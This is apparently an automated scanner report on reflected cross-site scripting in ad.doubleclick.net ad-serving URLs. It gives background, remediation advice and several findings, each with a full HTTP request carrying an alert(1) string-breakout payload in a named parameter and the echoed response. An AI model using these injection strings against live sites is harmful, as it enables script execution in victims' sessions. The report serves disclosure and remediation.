Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5697"-alert(1)-"859af6071e4 was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:24:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7483
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064e5697"-alert(1)-"859af6071e4&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retarge ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116b5"-alert(1)-"ab2c8675d53 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:25:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7563
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091116b5"-alert(1)-"ab2c8675d53&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Sit ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e53b7"-alert(1)-"e8d8af3e077 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:24:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7452
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957e53b7"-alert(1)-"e8d8af3e077&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c02"-alert(1)-"5944b1be99f was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:24:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7452
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X_1_ML_Edge_Site ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b520"-alert(1)-"016294d38d8 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:24:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7452
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_ze ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce61"-alert(1)-"f8f18babff8 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:25:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7483
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... -300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_Optimization_ ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab241"-alert(1)-"953a6304c42 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:25:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7563
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_ ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e59"-alert(1)-"bc570207b66 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:25:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/emergency-fund.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_EmergencyFund.swf-_-X_1_ML_Edge_Site_R ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6336"-alert(1)-"d2c6aa2a846 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 08 Feb 2011 02:24:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7452
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_- ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa54e'-alert(1)-'81bad4f984e was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064aa54e'-alert(1)-'81bad4f984e&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:28 GMT Expires: Tue, 08 Feb 2011 02:37:28 GMT Connection: close
